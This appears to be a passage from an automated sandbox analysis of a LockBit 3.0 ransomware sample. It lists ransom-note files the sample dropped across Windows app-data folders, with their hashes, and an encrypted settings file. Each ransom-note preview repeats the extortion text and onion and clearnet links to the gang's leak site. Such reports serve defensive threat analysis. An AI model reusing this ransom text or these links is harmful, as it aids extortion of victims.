                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WebMediaExtensions_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WebMediaExtensions_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WebMediaExtensions_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WebMediaExtensions_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WebMediaExtensions_8wekyb3d8bbwe\Settings\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8431
                Entropy (8bit):7.9818028978302005
                Encrypted:false
                SSDEEP:96:mjqGEfwKobpw9xMcWXSb6uMP87QyEE+h/P3LIsYX5DjBiZzwIAN0OJ9Ib+D0g+10:mjqGeob+8RHUXNcANkb+wl/lDKFFnCo
                MD5:56A46129867BCA121F7ACF6CFC6C72BA
                SHA1:A1044B356261B008551D24C78923FA5F14B3BCCF
                SHA-256:2871B7CEFA06BB040B791CCA59EACDDC3E3B273EE2FDC1F3882CA1CC644E28C4
                SHA-512:836BA3EE847597E44CC97A42E2380D8AF4CC2C31AF7BD644C3404ECE8188AE53534345B7500D750BA94AE53F6AA527552E1DE644FCC1FFF57EB3BC4170A0DAA4
                Malicious:false
                Preview:...O..5[...E....t .;.fm.)..T.9.$1(a8.o...~..|>..I]..Tyeh.J..d.Z.~....Y.LWc....j].....a..~.V;.A*^..................!.....l.m#.X...h.GK..$....K..]6.|)'.'.{=@..1Y3.'...A?v...C0.S$.$.J.....JA.....I.fY......[*&.|....^..U..<X.CC$r..J.S..A3..aqt..1a....G....^...Xa.X$T.L...h7.......M.f.../i..v....:..T.g......*....c.p<......<.S...]q...uHE.....R..Ag../?)..`.K.\\z..K+....;...*].......\...$..A.....r..v...y.y-..}(g........?..E..W..\P..sZ.H....5...f..l...d.'.|.B)..O...fl.....].5@.....=..]..Y....^.H\.%zN.M.o...w..'~.u8.$.V.m..9O.r.e....nTCv....../.?...\.).....5$..se.jA)..=.}z~.....g...%....(C#o.Ak.S...eyX.TNoj...j.#_.{:.wx.'.T.....Y....WP.o|.p3.o7` 2..'.XV.g...Q..)8.\J...q.@..I.t....T.c.a".Z...!...M...lfF..}QA..D.>`.....t..w.D.Y....?........q..e2..j`vb..!]....1...,..>.o.d..:-...A..."..#.MB7.lS..n...........K:.}.P.Y=J....n....._..>....D.v.....i..h.!?...M.l#....d.]Y.m.f{.N........s~.....0.q..R...%a..r...-....\.?.k..Uj.2hY.a..%?......6.Zr.N.5.......e..

                C:\Users\user\AppData\Local\Packages\Microsoft.WebMediaExtensions_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WebMediaExtensions_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WebMediaExtensions_8wekyb3d8bbwe\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
